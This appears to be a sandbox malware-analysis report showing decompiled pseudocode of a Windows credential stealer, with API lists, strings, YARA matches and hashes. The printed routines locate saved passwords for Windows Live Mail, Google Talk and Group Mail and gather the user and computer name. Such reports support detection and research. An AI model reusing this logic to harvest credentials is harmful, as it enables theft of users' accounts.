                                                                        				_push(0x4123e0);
                                                                        				E00411840(__ebx, __edi, __esi);
                                                                        				_t33 = GetModuleHandleA(0);
                                                                        				if(_t33->i != 0x5a4d) {
                                                                        					L4:
                                                                        					 *(_t71 - 0x1c) = 0;
                                                                        				} else {
                                                                        					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                        					if( *_t65 != 0x4550) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
                                                                        						if(_t56 == 0x10b) {
                                                                        							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
                                                                        							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
                                                                        								goto L4;
                                                                        							} else {
                                                                        								_t57 = 0;
                                                                        								__eflags =  *(_t65 + 0xe8);
                                                                        								goto L9;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t56 == 0x20b) {
                                                                        								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
                                                                        								if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
                                                                        									goto L4;
                                                                        								} else {
                                                                        									_t57 = 0;
                                                                        									__eflags =  *(_t65 + 0xf8);
                                                                        									L9:
                                                                        									_t9 = __eflags != 0;
                                                                        									__eflags = _t9;
                                                                        									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
                                                                        								}
                                                                        							} else {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				 *(_t71 - 4) = 0;
                                                                        				__set_app_type(2);
                                                                        				 *0x417b6c =  *0x417b6c | 0xffffffff;
                                                                        				 *0x417b70 =  *0x417b70 | 0xffffffff;
                                                                        				_t35 = __p__fmode();
                                                                        				_t62 =  *0x416b8c; // 0x0
                                                                        				 *_t35 = _t62;
                                                                        				_t36 = __p__commode();
                                                                        				_t63 =  *0x416b88; // 0x0
                                                                        				 *_t36 = _t63;
                                                                        				 *0x417b68 =  *_adjust_fdiv;
                                                                        				_t39 = E00401A4D();
                                                                        				_t79 =  *0x416000; // 0x1
                                                                        				if(_t79 == 0) {
                                                                        					__setusermatherr(E00401A4D);
                                                                        					_pop(_t63);
                                                                        				}
                                                                        				E0041182C(_t39);
                                                                        				_push(0x4123b0);
                                                                        				_push(0x4123ac);
                                                                        				L00411826();
                                                                        				_t41 =  *0x416b84; // 0x0
                                                                        				 *(_t71 - 0x20) = _t41;
                                                                        				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
                                                                        				_push(0x4123a8);
                                                                        				_push(0x412394); // executed
                                                                        				L00411826(); // executed
                                                                        				_t69 =  *_acmdln;
                                                                        				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                        				if( *_t69 != 0x22) {
                                                                        					while(1) {
                                                                        						__eflags =  *_t69 - 0x20;
                                                                        						if(__eflags <= 0) {
                                                                        							goto L17;
                                                                        						}
                                                                        						_t69 = _t69 + 1;
                                                                        						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                        					}
                                                                        				} else {
                                                                        					do {
                                                                        						_t69 = _t69 + 1;
                                                                        						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                        						_t55 =  *_t69;
                                                                        					} while (_t55 != 0 && _t55 != 0x22);
                                                                        					if( *_t69 == 0x22) {
                                                                        						L16:
                                                                        						_t69 = _t69 + 1;
                                                                        						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
                                                                        					}
                                                                        				}
                                                                        				L17:
                                                                        				_t48 =  *_t69;
                                                                        				if(_t48 != 0 && _t48 <= 0x20) {
                                                                        					goto L16;
                                                                        				}
                                                                        				 *(_t71 - 0x4c) = 0;
                                                                        				GetStartupInfoA(_t71 - 0x78);
                                                                        				_t87 =  *(_t71 - 0x4c) & 0x00000001;
                                                                        				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
                                                                        					_t50 = 0xa;
                                                                        				} else {
                                                                        					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
                                                                        				}
                                                                        				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
                                                                        				_t70 = _t52;
                                                                        				 *(_t71 - 0x7c) = _t70;
                                                                        				if( *(_t71 - 0x1c) == 0) {
                                                                        					exit(_t70); // executed
                                                                        				}
                                                                        				__imp___cexit();
                                                                        				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                        				return E00411879(_t70);
                                                                        			}





















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                        • String ID:
                                                                        • API String ID: 3662548030-0
                                                                        • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                        • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                                        • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                                        • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00410D1B(void* __eflags, intOrPtr _a4) {
                                                                        				void _v275;
                                                                        				char _v276;
                                                                        				char _v532;
                                                                        				void _v539;
                                                                        				char _v540;
                                                                        				void _v795;
                                                                        				char _v796;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				int _t44;
                                                                        				char* _t46;
                                                                        				char* _t48;
                                                                        				void* _t64;
                                                                        				intOrPtr _t65;
                                                                        				void* _t66;
                                                                        				signed int _t68;
                                                                        				void* _t74;
                                                                        				void* _t75;
                                                                        
                                                                        				_t75 = __eflags;
                                                                        				_v796 = 0;
                                                                        				memset( &_v795, 0, 0x104);
                                                                        				_t64 = 0x1c;
                                                                        				_t61 =  &_v796;
                                                                        				 *((intOrPtr*)(_a4 + 4)) = 1;
                                                                        				E0040EE59( &_v796, _t64); // executed
                                                                        				E00406734( &_v796, "\\Microsoft\\Windows Mail");
                                                                        				_t65 = _a4;
                                                                        				E00410C43(_t65, _t75, _t61); // executed
                                                                        				 *((intOrPtr*)(_t65 + 4)) = 2;
                                                                        				_t66 = 0x1c;
                                                                        				E0040EE59(_t61, _t66);
                                                                        				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
                                                                        				E00410C43(_a4, _t75, _t61); // executed
                                                                        				_v276 = 0;
                                                                        				memset( &_v275, 0, 0x104);
                                                                        				_v540 = 0;
                                                                        				memset( &_v539, 0, 0x104);
                                                                        				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
                                                                        				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
                                                                        				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
                                                                        				_t44 = strlen( &_v540);
                                                                        				if(_t44 > 0) {
                                                                        					_t48 = _t74 + _t44 + 0x117;
                                                                        					if( *_t48 == 0x5c) {
                                                                        						 *_t48 = 0;
                                                                        					}
                                                                        				}
                                                                        				_push( &_v532);
                                                                        				_t46 =  &_v796;
                                                                        				_push(_t46);
                                                                        				L004115B2();
                                                                        				_t78 = _t46;
                                                                        				if(_t46 != 0) {
                                                                        					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
                                                                        				}
                                                                        				return _t46;
                                                                        			}





















                                                                        APIs
                                                                        • memset.MSVCRT ref: 00410D3C
                                                                          • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                          • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                          • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                          • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                          • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                          • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                        • memset.MSVCRT ref: 00410DAA
                                                                        • memset.MSVCRT ref: 00410DC5
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                        • strlen.MSVCRT ref: 00410E0C
                                                                        • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                        Strings
                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                        • Store Root, xrefs: 00410DD6
                                                                        • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                        • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                        • API String ID: 4071991895-2578778931
                                                                        • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                        • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                        • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                        • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00404837(void* __ecx) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				struct HWND__* _t6;
                                                                        				_Unknown_base(*)()* _t11;
                                                                        				struct HWND__* _t13;
                                                                        				struct HWND__* _t15;
                                                                        				void* _t20;
                                                                        				struct HINSTANCE__* _t23;
                                                                        
                                                                        				_v12 = 8;
                                                                        				_v8 = 0xff;
                                                                        				_t15 = 0;
                                                                        				_t20 = 0;
                                                                        				_t23 = LoadLibraryA("comctl32.dll");
                                                                        				if(_t23 == 0) {
                                                                        					L5:
                                                                        					__imp__#17();
                                                                        					_t6 = 1;
                                                                        					L6:
                                                                        					if(_t6 != 0) {
                                                                        						return 1;
                                                                        					} else {
                                                                        						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                        				if(_t11 != 0) {
                                                                        					_t20 = 1; // executed
                                                                        					_t13 =  *_t11( &_v12); // executed
                                                                        					_t15 = _t13;
                                                                        				}
                                                                        				FreeLibrary(_t23);
                                                                        				if(_t20 == 0) {
                                                                        					goto L5;
                                                                        				} else {
                                                                        					_t6 = _t15;
                                                                        					goto L6;
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 00404856
                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040487C
                                                                        • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,73B74DE0), ref: 0040488A
                                                                        • MessageBoxA.USER32 ref: 004048A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 2780580303-317687271
                                                                        • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                        • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                        • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                        • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
                                                                        				char _v276;
                                                                        				char _v404;
                                                                        				intOrPtr _v408;
                                                                        				char _v792;
                                                                        				intOrPtr _v796;
                                                                        				char _v924;
                                                                        				char _v936;
                                                                        				void _v1959;
                                                                        				char _v1960;
                                                                        				void _v2983;
                                                                        				char _v2984;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* _t28;
                                                                        				void* _t50;
                                                                        				void* _t51;
                                                                        				char* _t59;
                                                                        				char* _t63;
                                                                        				void* _t70;
                                                                        
                                                                        				_t70 = __fp0;
                                                                        				_t51 = __ecx;
                                                                        				_v1960 = 0;
                                                                        				memset( &_v1959, 0, 0x3ff);
                                                                        				_v2984 = 0;
                                                                        				memset( &_v2983, 0, 0x3ff);
                                                                        				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
                                                                        				if(_t28 == 0) {
                                                                        					return _t28;
                                                                        				}
                                                                        				E004021D8( &_v936);
                                                                        				_push( &_v1960);
                                                                        				_t50 = 0x7f;
                                                                        				E004060D0(_t50,  &_v276);
                                                                        				_t59 =  &_v404;
                                                                        				E004060D0(_t50, _t59,  &_v2984);
                                                                        				_v796 = 9;
                                                                        				_v408 = 3;
                                                                        				_t63 = strchr(_t59, 0x40);
                                                                        				_push( &_v404);
                                                                        				if(_t63 == 0) {
                                                                        					if(strlen() + 0xa < 0) {
                                                                        						sprintf( &_v792, "%s@yahoo.com",  &_v404);
                                                                        					}
                                                                        				} else {
                                                                        					strcpy( &_v792, ??);
                                                                        					 *_t63 = 0;
                                                                        				}
                                                                        				strcpy( &_v924,  &_v404);
                                                                        				return E00402407( &_v936, _t70, _a4);
                                                                        			}






















                                                                        APIs
                                                                        • memset.MSVCRT ref: 004037D2
                                                                        • memset.MSVCRT ref: 004037E6
                                                                          • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                          • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        • strchr.MSVCRT ref: 00403855
                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                        • strlen.MSVCRT ref: 0040387E
                                                                        • sprintf.MSVCRT ref: 0040389E
                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                        • String ID: %s@yahoo.com
                                                                        • API String ID: 1649821605-3288273942
                                                                        • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                        • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                                        • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                        • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                        				void _v267;
                                                                        				char _v268;
                                                                        				void _v531;
                                                                        				char _v532;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t15;
                                                                        				void* _t23;
                                                                        				char* _t28;
                                                                        
                                                                        				_t23 = __ecx;
                                                                        				_v532 = 0;
                                                                        				memset( &_v531, 0, 0x104);
                                                                        				_v268 = 0;
                                                                        				memset( &_v267, 0, 0x104);
                                                                        				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
                                                                        				if(_t15 != 0) {
                                                                        					strcpy( &_v268,  &_v532);
                                                                        					_t28 =  &_v268;
                                                                        					E00405F1F(_t28);
                                                                        					strcat(_t28, "fb.dat");
                                                                        					return E004033D7(_t28, __fp0, _a4);
                                                                        				}
                                                                        				return _t15;
                                                                        			}













                                                                        APIs
                                                                        • memset.MSVCRT ref: 004034EB
                                                                        • memset.MSVCRT ref: 00403501
                                                                          • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                        • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                          • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                          • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                        • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetstrcat$Closestrcpystrlen
                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                        • API String ID: 1387626053-966475738
                                                                        • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                        • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                                        • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                        • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
                                                                        				void* _v0;
                                                                        				char _v4;
                                                                        				long _t29;
                                                                        				void* _t33;
                                                                        				void* _t36;
                                                                        				signed int _t54;
                                                                        				void* _t56;
                                                                        				void* _t57;
                                                                        				void* _t58;
                                                                        
                                                                        				_t50 = __ecx;
                                                                        				E004118A0(0x1110, __ecx);
                                                                        				E0040724C(_a4); // executed
                                                                        				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
                                                                        				_t56 = (_t54 & 0xfffffff8) + 0xc;
                                                                        				if(_t29 == 0) {
                                                                        					_a4 = 0;
                                                                        					_a12 = 0;
                                                                        					memset( &_a13, 0, 0xff);
                                                                        					_t57 = _t56 + 0xc;
                                                                        					_t33 = E0040EC05(_v0, 0,  &_a12);
                                                                        					while(1) {
                                                                        						_t58 = _t57 + 0xc;
                                                                        						if(_t33 != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
                                                                        						_t57 = _t58 + 0xc;
                                                                        						if(_t36 == 0) {
                                                                        							_a268 = 0;
                                                                        							memset( &_a269, 0, 0xfff);
                                                                        							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
                                                                        							_t57 = _t57 + 0x18;
                                                                        							E00407406( &_a268, _a4,  &_a12);
                                                                        							RegCloseKey(_v0);
                                                                        						}
                                                                        						_a4 = _a4 + 1;
                                                                        						_t33 = E0040EC05(_v0, _a4,  &_a12);
                                                                        					}
                                                                        					_t29 = RegCloseKey(_v0);
                                                                        				}
                                                                        				return _t29;
                                                                        			}













                                                                        APIs
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                          • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                          • Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
                                                                          • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                          • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                          • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                          • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                          • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                          • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 0040759B
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • memset.MSVCRT ref: 004075EC
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                        Strings
                                                                        • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                        • String ID: Software\Google\Google Talk\Accounts
                                                                        • API String ID: 2959138223-1079885057
                                                                        • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                        • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                                        • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                        • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E0040A5AC(void* __eax) {
                                                                        				void* __esi;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				void* _t31;
                                                                        				intOrPtr _t34;
                                                                        				char* _t44;
                                                                        				void* _t45;
                                                                        				intOrPtr* _t46;
                                                                        				int _t47;
                                                                        
                                                                        				_t45 = __eax;
                                                                        				_t37 =  *((intOrPtr*)(__eax + 0x37c));
                                                                        				_t47 = 0;
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
                                                                        					do {
                                                                        						_t31 = E00406DEB(_t47, _t37);
                                                                        						_push(_t31);
                                                                        						_push("/sort");
                                                                        						L004115C4();
                                                                        						if(_t31 == 0) {
                                                                        							_t4 = _t47 + 1; // 0x1
                                                                        							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
                                                                        							_t54 =  *_t44 - 0x7e;
                                                                        							_t34 =  *((intOrPtr*)(_t45 + 0x370));
                                                                        							if( *_t44 != 0x7e) {
                                                                        								_push(0);
                                                                        							} else {
                                                                        								_push(1);
                                                                        								_t44 = _t44 + 1;
                                                                        							}
                                                                        							_push(_t44);
                                                                        							E0040A119(_t34, _t54);
                                                                        						}
                                                                        						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
                                                                        						_t47 = _t47 + 1;
                                                                        					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
                                                                        				}
                                                                        				E00405E2C();
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
                                                                        				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
                                                                        				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
                                                                        					_t46 =  *((intOrPtr*)(_t45 + 0x370));
                                                                        					if( *0x41748c == 0) {
                                                                        						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
                                                                        						 *0x41748c = 1;
                                                                        					}
                                                                        					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
                                                                        					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
                                                                        				}
                                                                        				return SetCursor( *0x416b98);
                                                                        			}












                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Cursor_mbsicmpqsort
                                                                        • String ID: /nosort$/sort
                                                                        • API String ID: 882979914-1578091866
                                                                        • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                        • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                                        • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                        • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 25%
                                                                        			E0040EE59(char* __edi, void* __esi) {
                                                                        				void* _v8;
                                                                        				char _v40;
                                                                        				void _v299;
                                                                        				char _v300;
                                                                        				void* _t32;
                                                                        				char* _t37;
                                                                        				void* _t38;
                                                                        
                                                                        				_t38 = __esi;
                                                                        				_t37 = __edi;
                                                                        				E0040EDAC();
                                                                        				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
                                                                        					_v300 = 0;
                                                                        					memset( &_v299, 0, 0x103);
                                                                        					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
                                                                        						_push( &_v8);
                                                                        						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                        						_push(0x80000002);
                                                                        					} else {
                                                                        						_push( &_v8);
                                                                        						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                        						_push(0x80000001);
                                                                        					}
                                                                        					if(E0040EB3F() == 0) {
                                                                        						E0040EDDB(_t38);
                                                                        						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
                                                                        						RegCloseKey(_v8);
                                                                        					}
                                                                        					strcpy(_t37,  &_v300);
                                                                        					return 0 |  *_t37 != 0x00000000;
                                                                        				} else {
                                                                        					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
                                                                        					return _t32;
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                          • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                          • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                        • memset.MSVCRT ref: 0040EEAE
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                        • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                          • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                        Memory Dump Source
